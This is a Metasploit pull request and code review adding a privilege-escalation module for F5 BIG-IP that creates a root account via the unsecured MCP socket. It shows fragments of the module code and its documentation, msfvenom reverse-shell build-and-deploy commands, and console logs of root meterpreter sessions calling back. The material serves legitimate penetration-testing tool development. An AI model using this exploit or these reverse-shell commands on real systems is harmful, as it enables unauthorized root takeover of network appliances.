### PR TITLE
Add a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account

### PR DESCRIPTION
**Pull request by rbowes-r7**
This adds one final F5 module - a privilege escalation by creating a new user account using the MCP protocol and globally-accessible socket.

## Verification

- [ ] Start `msfconsole`
- [ ] Get a non-root session - I use `multi/handler` + `msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 "sudo -u apache /tmp/testexploit.elf"`
- [ ] Run `use exploit/linux/local/f5_create_user`
- [ ] Set `SESSION` to the ID of the previously created session
- [ ] `run`, and get root

The docs/ should be up to date!

### CODE REVIEW

**Comment by jmartin-r7** [comment]
@msjenkins-r7 test this please.

File: documentation/modules/exploit/linux/local/f5_create_user.md [hunk 1]
```diff
@@ -0,0 +1,168 @@
...
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: Get a non-root session somehow (eg: `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp` then `./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf`)
```
Comment (jheysel-r7) [inline documentation/modules/exploit/linux/local/f5_create_user.md:15]:
```suggestion
3. Do: Get a non-root session somehow (eg: `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp` then `./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF
chmod +x /tmp/testexploit.elf
sudo -u apache /tmp/testexploit.elf
EOF`)
```
I was getting the following error when copying step 3: `sudo: /tmp/testexploit.elf: command not found` .
The above worked for me. I think you need to chmod the file before running it - running two commands in a oneliner after sshing to the target led me to direct the output of EOF into bash

File: modules/exploits/linux/local/f5_create_user.rb [hunk 2]
```diff
@@ -0,0 +1,157 @@
...
+    end
+
+    # Let them know if it likely worked
+    if !error_returned
+      print_good("Service didn't return an error, so user was likely created!")
+
+      if datastore['CREATE_SESSION']
+        print_status('Attempting create a root session...')
+
+        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")
```
Comment (jheysel-r7) [inline modules/exploits/linux/local/f5_create_user.rb:151]: When running the module the user with root privs gets created but when trying to return the session, this line has been erroring for me:

```
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Will attempt to create user msfuser / rewV8IDpMeK0, then change password to N0tpassword! when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Output from su command: Password: su: Authentication failure
[*] Exploit completed, but no session was created.
```

I don't think the password is getting set correctly when the user is getting created. After running the module checking `/etc/shadow` is populated with the following but the password I set doesn't seem to work:
```
msfuser:$6C4Bhe/I.GRg:0:0:99999:7:::
```

Seeing similar behaviour when setting CREATE_SESSION to false:
```
^Cmsf6 exploit(linux/local/f5_create_user) > set username msfuser1
username => msfuser1
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Will attempt to create user msfuser1 / N0tpassword!
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Exploit completed, but no session was created.
```

I've been testing on:
```
[root@localhost:NO LICENSE:Standalone] tmp # tmsh show sys version

Sys::Version
Main Package
  Product     BIG-IP
  Version     17.0.0.1
  Build       0.0.4
  Edition     Point Release 1
  Date        Fri Jul 15 01:45:12 PDT 2022
 ```
 @rbowes-r7, any idea what might be causing an issue here?

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the awesome contribution @rbowes-r7! For the most part the module looks great/ well written. Ran into an issue testing, could be a me problem though not too sure. Let me know what you think when you're back, happy holidays :)

File: modules/exploits/linux/local/f5_create_user.rb [hunk 3]
```diff
@@ -0,0 +1,157 @@
...
+      OptString.new('USERNAME', [false, 'Username to create (default: random)']),
+      OptString.new('PASSWORD', [false, 'Password for the new user (default: random)']),
+
+      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),
+    ])
+  end
+
+  def exploit
+    # Get or generate the username/password
+    username = datastore['USERNAME'] || Rex::Text.rand_text_alphanumeric(8)
```
Comment (cdelafuente-r7) [inline modules/exploits/linux/local/f5_create_user.rb:58]: Note that this won't prevent the operator to intentionally set the option to an empty string. I suggest this instead:
```suggestion
    username = datastore['USERNAME'].present? ? datastore['USERNAME'] : Rex::Text.rand_text_alphanumeric(8)
```

Or, if you chose to move `Rex::Text.rand_text_alphanumeric` to the option declaration (see my previous comment), you can simply add a check for empty strings:
```suggestion
    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?
```

This also apply to the `PASSWORD` option below.

File: modules/exploits/linux/local/f5_create_user.rb (hunk 2 above)
Comment (jheysel-r7) [reply modules/exploits/linux/local/f5_create_user.rb:151]: Works when running `msfconsole` on linux.  As discussed at module hacking my original testing was done on MacOS and likely didn't work due to the use of the `crypt` function
```
msf6 exploit(linux/local/f5_create_user) > set session 2
session => 2
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Will attempt to create user IxDuIZgt / Avi3GqQuAUle, then change password to xNXegIDs4doK when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (24380 bytes) to 172.16.199.133
[*] Meterpreter session 3 opened (172.16.199.158:4444 -> 172.16.199.133:41948) at 2023-01-05 12:17:20 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```

**Comment by rbowes-r7** [comment]
Just wanted to say that I haven't forgotten this, but haven't had time to work on it either

File: modules/exploits/linux/local/f5_create_user.rb [hunk 4]
```diff
@@ -0,0 +1,157 @@
...
+      print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")
+    else
+      password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
+
+      print_status("Will attempt to create user #{username} / #{password}")
+    end
+
+    # If the password is already hashed, leave it as-is
+    vprint_status('Hashing the password with a pseudorandom salt')
+    hashed_password = password.crypt("$6$#{Rex::Text.rand_text_alphanumeric(8)}$")
```
[the remark this answers is not in the document]
Comment (rbowes-r7) [reply modules/exploits/linux/local/f5_create_user.rb]: I couldn't find a way to use `digest` or `OpenSSL` to create a `$6$` password, and that' *really* hard to Google. I did, however, find that we use the `UnixCrypt` gem, and that seems to work!

**Comment by jheysel-r7** [comment]
Thanks so much Ron! Changes work great. Awesome module 🚢 
```
msf6 exploit(multi/handler) > use modules/exploit/linux/local/f5_create_user.md
[-] No results from search
[-] Failed to load module: exploit/linux/local/f5_create_user.md
msf6 exploit(multi/handler) > use modules/exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > set session 1
session => 1
msf6 exploit(linux/local/f5_create_user) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/f5_create_user) > set lport 4445
lport => 4445
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.123.1:4445
[*] Will attempt to create user DMi6W0t1 / ZvGNep2BFL23, then change password to 6gsAldAIMSHc when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (24380 bytes) to 192.168.123.216
[*] Meterpreter session 2 opened (192.168.123.1:4445 -> 192.168.123.216:53188) at 2023-02-02 14:01:19 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```

**Comment by jheysel-r7** [comment]
# Release Notes
This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account

**Pull request merged**